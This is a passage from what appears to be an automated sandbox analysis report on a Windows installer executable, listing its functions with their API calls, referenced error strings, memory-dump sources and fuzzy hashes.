                                                                                                                                                                  • Opcode Fuzzy Hash: 158b2412e53a17054355f58b5a0970194ef28ab8687ae819dccb3abf3e138edb
                                                                                                                                                                  • Instruction Fuzzy Hash: 1511AF72A0021ABBDB11AF96DD05BDFBAA9EB44750F110127FD04B6190D7389E10EAA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EA93, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 0040EAE5
                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 0040EAF8
                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 0040EB13
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate memory for message., xrefs: 0040EACE
                                                                                                                                                                  • pipe.cpp, xrefs: 0040EAC4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s$Heap$AllocProcess
                                                                                                                                                                  • String ID: Failed to allocate memory for message.$pipe.cpp
                                                                                                                                                                  • API String ID: 387492374-1914209504
                                                                                                                                                                  • Opcode ID: 486cf85ab1759526ee8ffbbef8e5b54e91eaf28850e258cd2f6d1fe63d897ae0
                                                                                                                                                                  • Instruction ID: d958dfc76fb2f7c153e71d7a3169c5766fda7b9461ff1750d6d5b8af0056db1f
                                                                                                                                                                  • Opcode Fuzzy Hash: 486cf85ab1759526ee8ffbbef8e5b54e91eaf28850e258cd2f6d1fe63d897ae0
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C1191B2601319AFDB05EE91DC82DDBB3ACEF48714B40452FBA119B151EB75E910CBE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411F61, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,004125F4,0000001A,00000000,?,00000000,00000000), ref: 00411FAA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,004125F4,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00411FB4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocCreateErrorKnownLastProcessWell
                                                                                                                                                                  • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                                                                                                                  • API String ID: 1343019080-2110050797
                                                                                                                                                                  • Opcode ID: bee72ccd2a7715efa9315aa30431def083f49146d1e00836d66e12c672e560c2
                                                                                                                                                                  • Instruction ID: b4740bdf9ada971b8724c08a230f72c8d0ddd4f7555a3e34bcef09611869e6fa
                                                                                                                                                                  • Opcode Fuzzy Hash: bee72ccd2a7715efa9315aa30431def083f49146d1e00836d66e12c672e560c2
                                                                                                                                                                  • Instruction Fuzzy Hash: BB012F335413207AE72066666C06F9F69D8DF55BA5F21011BFD04FB190D7AC8D4186EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402881, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ComputerErrorLastName
                                                                                                                                                                  • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 3560734967-484636765
                                                                                                                                                                  • Opcode ID: e4151da32efde3dfcfd1c1a763d69c3bddde274192894ae59bcf0cbd63f1e9bb
                                                                                                                                                                  • Instruction ID: 05485a5853cf41ec9b0cfe3b0c78c1fd617eacfd0e55be2779fea02b51560dfb
                                                                                                                                                                  • Opcode Fuzzy Hash: e4151da32efde3dfcfd1c1a763d69c3bddde274192894ae59bcf0cbd63f1e9bb
                                                                                                                                                                  • Instruction Fuzzy Hash: C8016932A402286BDB10EA65AD45BDF77E8AB4D714F11112BF901F71C0EB689D0487ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405AB1, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405B28
                                                                                                                                                                  Strings
                                                                                                                                                                  • Condition, xrefs: 00405AC3
                                                                                                                                                                  • Failed to copy condition string from BSTR, xrefs: 00405B12
                                                                                                                                                                  • Failed to get Condition inner text., xrefs: 00405AF8
                                                                                                                                                                  • Failed to select condition node., xrefs: 00405ADF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
                                                                                                                                                                  • API String ID: 3341692771-3600577998
                                                                                                                                                                  • Opcode ID: 7a6a6af257248f38a3366a64446e206b4a5e63895da4c11a9ded8eeebe9cf38f
                                                                                                                                                                  • Instruction ID: fd10bcafae711a7912bfb5a69d5153a33235308cf81daeb7f25b2cb9f6ca65ee
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a6a6af257248f38a3366a64446e206b4a5e63895da4c11a9ded8eeebe9cf38f
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D11A532E40628BBCB15AB90DC46FAF7A78DB04715F21116AF801B6290D779BE409F9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004027E9, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 55COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 004027FB
                                                                                                                                                                    • Part of subcall function 00432058: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00402807,00000000), ref: 0043206C
                                                                                                                                                                    • Part of subcall function 00432058: GetProcAddress.KERNEL32(00000000), ref: 00432073
                                                                                                                                                                    • Part of subcall function 00432058: GetLastError.KERNEL32(?,?,?,00402807,00000000), ref: 0043208A
                                                                                                                                                                    • Part of subcall function 004363EB: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00436418
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 0040285F
                                                                                                                                                                  • variable.cpp, xrefs: 00402825
                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 00402845
                                                                                                                                                                  • Failed to get shell folder., xrefs: 0040282F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 2084161155-3906113122
                                                                                                                                                                  • Opcode ID: 76bc22cc7f3ddf68ebd41daca45dd0fde40877fe6e065f2cf68cb6ed9368e821
                                                                                                                                                                  • Instruction ID: 830f5e0e8d0a1c41f45bb9628fb6c2be2519c3363833e8ab39fc8f86eed599d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 76bc22cc7f3ddf68ebd41daca45dd0fde40877fe6e065f2cf68cb6ed9368e821
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F01E532900628B7CF1176A1DD0AB9E3A689F14724F20523BF801B51C1D7BC9F00D69D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403017, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00403050
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040305A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastPathTemp
                                                                                                                                                                  • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 1238063741-2915113195
                                                                                                                                                                  • Opcode ID: 69b769e64f1c546930b6dbc442e2694130be7e16589a845829ff49b0d93e59e5
                                                                                                                                                                  • Instruction ID: ba617f85e17656ae530d534fbb2ac8a087b108c385ad9d7001b6f78f1c278d88
                                                                                                                                                                  • Opcode Fuzzy Hash: 69b769e64f1c546930b6dbc442e2694130be7e16589a845829ff49b0d93e59e5
                                                                                                                                                                  • Instruction Fuzzy Hash: D601DB76B413346BEB10AB657C06BAA77D89B08704F11016BFD00F71C1DB689E0046DD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00426382, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32 ref: 004263AA
                                                                                                                                                                  • PeekMessageW.USER32 ref: 004263BF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00426589,?,?,?,00000001,00000000), ref: 004263C7
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed while waiting for download., xrefs: 004263F5
                                                                                                                                                                  • bitsengine.cpp, xrefs: 004263EB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                                                                                                                  • String ID: Failed while waiting for download.$bitsengine.cpp
                                                                                                                                                                  • API String ID: 435350009-228655868
                                                                                                                                                                  • Opcode ID: 183ca1ca1fcb96c1870708b5ddd418084d59c1701e5472ab8fc9091609c92573
                                                                                                                                                                  • Instruction ID: ba26056bc0dac6d4787afc0dc376d1069d6d4bff793d815538b03b51bb090824
                                                                                                                                                                  • Opcode Fuzzy Hash: 183ca1ca1fcb96c1870708b5ddd418084d59c1701e5472ab8fc9091609c92573
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F01D832A05234BAE72096AA6C09FDB7AECEF04760F110227FE05F71C0E664990085EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00431FB6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000001F4,?,00000001,?,?,00419A4B,?,000001F4,?,?,?,?,?,?,?,?), ref: 00431FC6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00419A4B,?,000001F4,?,?,?,?,?,?,?,?), ref: 00431FD4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                  • API String ID: 1211598281-1178289305
                                                                                                                                                                  • Opcode ID: e5915ac0734ccd4c2d4a3a19815c126f4bb917d4237a8e1704d839c2f7b68766
                                                                                                                                                                  • Instruction ID: 285693b45c103507da9a82e376e54a8a61da210baf673d537173aea25a2a10ee
                                                                                                                                                                  • Opcode Fuzzy Hash: e5915ac0734ccd4c2d4a3a19815c126f4bb917d4237a8e1704d839c2f7b68766
                                                                                                                                                                  • Instruction Fuzzy Hash: 5411E931A00225EBDB109B758D0879F7AE4EB09750F114226FE05E7250D3798D01DAD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00436816, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436AF7: FindFirstFileW.KERNEL32(00000000,?,0000001C,00000000,00000000), ref: 00436B32
                                                                                                                                                                    • Part of subcall function 00436AF7: FindClose.KERNEL32(00000000), ref: 00436B3E
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000001,00000080,00401414,00000001,000000FF,00000000,?,?,00409F79,00000001,00000002,00401414,00000001,00401414,?,00000002), ref: 00436845
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00409F79,00000001,00000002,00401414,00000001,00401414,?,00000002,0000001C,00401414,00020006,00000001), ref: 0043684F
                                                                                                                                                                  • DeleteFileW.KERNEL32(00000001,00401414,00000001,000000FF,00000000,?,?,00409F79,00000001,00000002,00401414,00000001,00401414,?,00000002,0000001C), ref: 0043686E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00409F79,00000001,00000002,00401414,00000001,00401414,?,00000002,0000001C,00401414,00020006,00000001), ref: 00436878
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 3967264933-2967768451
                                                                                                                                                                  • Opcode ID: 68447300579d8e4cb9d5f0e8551f4aa6dc75a841ac8928d2923f91f0fe36431c
                                                                                                                                                                  • Instruction ID: 98eacb9971b34dc0b74c344d10cfe2c6eb13ff10e7b5b7d69fcb303ad0e4ed28
                                                                                                                                                                  • Opcode Fuzzy Hash: 68447300579d8e4cb9d5f0e8551f4aa6dc75a841ac8928d2923f91f0fe36431c
                                                                                                                                                                  • Instruction Fuzzy Hash: D901F531A02B26B6D7213E7A9C08B5B79E8EF0D795F029232FE01F61A0D725DD0085E8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042606E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00426083
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004260C8
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?), ref: 004260DC
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get state during job modification., xrefs: 0042609C
                                                                                                                                                                  • Failure while sending progress during BITS job modification., xrefs: 004260B7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                  • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                                                                                                                  • API String ID: 3094578987-1258544340
                                                                                                                                                                  • Opcode ID: f2c96889652f12d59821fd65ecc94766b933468a7362cfde5bd4a05c4956ccd9
                                                                                                                                                                  • Instruction ID: 1d9ad8ad080285d35a836eadbc89ce26e84db9437567d416b08aa87768bbbfb2
                                                                                                                                                                  • Opcode Fuzzy Hash: f2c96889652f12d59821fd65ecc94766b933468a7362cfde5bd4a05c4956ccd9
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B01B132701625FBCB15DB52E889A9F77ACFF04324B51461AE905E7240E738ED14DAE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00425E55, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,00426514,?,?,?,?,?,00000001,00000000,?), ref: 00425E6F
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00426514,?,?,?,?,?,00000001,00000000,?), ref: 00425E7A
                                                                                                                                                                  • GetLastError.KERNEL32(?,00426514,?,?,?,?,?,00000001,00000000,?), ref: 00425E87
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create BITS job complete event., xrefs: 00425EB5
                                                                                                                                                                  • bitsengine.cpp, xrefs: 00425EAB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                                                                                                                  • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                                                                                                                                  • API String ID: 3069647169-3441864216
                                                                                                                                                                  • Opcode ID: d2bd90b1625cbb4fecbd0c64ba04d8f84a28ddd82624711beb668f84de5ffee0
                                                                                                                                                                  • Instruction ID: 3df00e8a0922062b614be36183848c380a30c11a9f20d4e054128804f833d2d7
                                                                                                                                                                  • Opcode Fuzzy Hash: d2bd90b1625cbb4fecbd0c64ba04d8f84a28ddd82624711beb668f84de5ffee0
                                                                                                                                                                  • Instruction Fuzzy Hash: C0015272601622AFD3109F6AE805A87BBD8FF09761B114227FD08D7640E774D8108BEC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408682, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000D0,00000000,000000B8,00000000,?,0041109A,000000B8,00000000,00000000,00000000,74EDA770), ref: 00408691
                                                                                                                                                                  • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 004086A0
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000D0,?,0041109A,000000B8,00000000,00000000,00000000,74EDA770), ref: 004086B5
                                                                                                                                                                  Strings
                                                                                                                                                                  • Engine active cannot be changed because it was already in that state., xrefs: 004086D8
                                                                                                                                                                  • userexperience.cpp, xrefs: 004086CE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                                                                                                                  • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                                                                                                                                  • API String ID: 3376869089-1544469594
                                                                                                                                                                  • Opcode ID: 7fe0521ee1da205aa0e302e094d209ab01fe134c1119def7c480392db85ccc0b
                                                                                                                                                                  • Instruction ID: 091642d989456ce679b1e30e11bc7159c76c977f9364c1853374bc69f863b0e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 7fe0521ee1da205aa0e302e094d209ab01fe134c1119def7c480392db85ccc0b
                                                                                                                                                                  • Instruction Fuzzy Hash: 57F028373003046B87109FA6AC84EA733BCEB99725701443FF641D3280DB34E8048778
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004331E2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 0043320D
                                                                                                                                                                  • GetLastError.KERNEL32(?,004015F0,00000001,00000000,?,?,?,?,00401E79,?,?,?), ref: 0043321C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
